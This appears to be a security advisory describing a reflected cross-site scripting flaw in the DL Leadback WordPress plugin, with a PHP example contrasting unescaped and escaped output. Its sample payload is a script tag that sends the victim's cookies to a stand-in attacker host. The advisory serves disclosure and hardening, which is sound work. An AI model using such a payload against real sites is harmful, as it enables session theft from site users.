Impact
Improper neutralization of user input during web page generation lets an attacker inject script that the server echoes back unescaped into the page served to a victim's browser. The injected script executes in the site's origin with the victim's privileges and can steal session cookies, deface content, hijack navigation, or perform other client-side actions; if the victim is a logged-in WordPress administrator, those actions carry administrator rights. The flaw is exploitable without authentication: any user who opens a crafted URL can be affected. It is classified as a reflected cross-site scripting (XSS) vulnerability in the DL Leadback plugin for WordPress.
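The pattern behind a reflected XSS of this kind, shown as an added illustration rather than code from the DL Leadback plugin (the plugin's actual handler is not on this page). The parameter name `dl_name`, the function names, and the attacker URL are hypothetical; `esc_html()` and `esc_attr()` are WordPress's real escaping helpers, with a `htmlspecialchars()` stand-in defined so the file runs outside WordPress:

```php
<?php
// Added example, not the plugin's code. Demonstrates a query value reflected
// into HTML without escaping (vulnerable) and the same output with
// context-appropriate escaping (hardened).

// Stand-ins for WordPress's esc_html()/esc_attr() so this runs under plain PHP.
// Inside WordPress the real functions are used and these definitions are skipped.
if (!function_exists('esc_html')) {
    function esc_html(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}

// VULNERABLE: the raw request value is concatenated straight into the page.
// In WordPress, $_GET values also carry added slashes; wp_unslash() would
// normally be applied first, which does not make this any safer.
function render_vulnerable(array $get): string {
    $name = $get['dl_name'] ?? '';
    return '<p>Hello, ' . $name . '</p>'
         . '<input type="text" name="dl_name" value="' . $name . '">';
}

// HARDENED: each untrusted value is escaped for the context it lands in:
// esc_html() for element content, esc_attr() for a quoted attribute value.
function render_hardened(array $get): string {
    $name = isset($get['dl_name']) ? (string) $get['dl_name'] : '';
    return '<p>Hello, ' . esc_html($name) . '</p>'
         . '<input type="text" name="dl_name" value="' . esc_attr($name) . '">';
}

// Constructed sample of what an attacker would place in a link sent to the
// victim (e.g. https://victim.example/?dl_name=<payload>, URL-encoded).
$payload = '"><script>location="https://attacker.example/?c="+document.cookie</script>';
$crafted = ['dl_name' => $payload];

$out = render_vulnerable($crafted);
if (strpos($out, '<script>') !== false) {
    echo "vulnerable: attacker's <script> tag is reflected verbatim\n";
}

$out = render_hardened($crafted);
if (strpos($out, '<script>') === false) {
    echo "hardened: payload is rendered as inert text (&lt;script&gt;)\n";
}
```

The double quote in the payload is what lets it break out of the `value="..."` attribute in the vulnerable version; `esc_attr()` turns it into `&quot;`, so the browser keeps treating the whole string as attribute text.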
Affected Systems
The vulnerability affects the DL Leadback plugin for WordPress, developed by DyadyaLesha. Every release of the plugin up to and including version 1.2.1 is affected.
Risk and Exploitability
With a CVSS score of 7.1 the flaw is rated high severity, but its EPSS score of under 1% indicates a low probability of exploitation in the wild. It is not listed in the CISA KEV catalog, so no large-scale, documented exploitation is currently known. The attack depends on a maliciously crafted URL being delivered to and opened by a user, whose browser then renders the reflected payload. No privileges or server-side access are required, but social engineering to get the target to visit the URL is usually necessary, and the impact scales with the privileges of the account the victim is logged in with.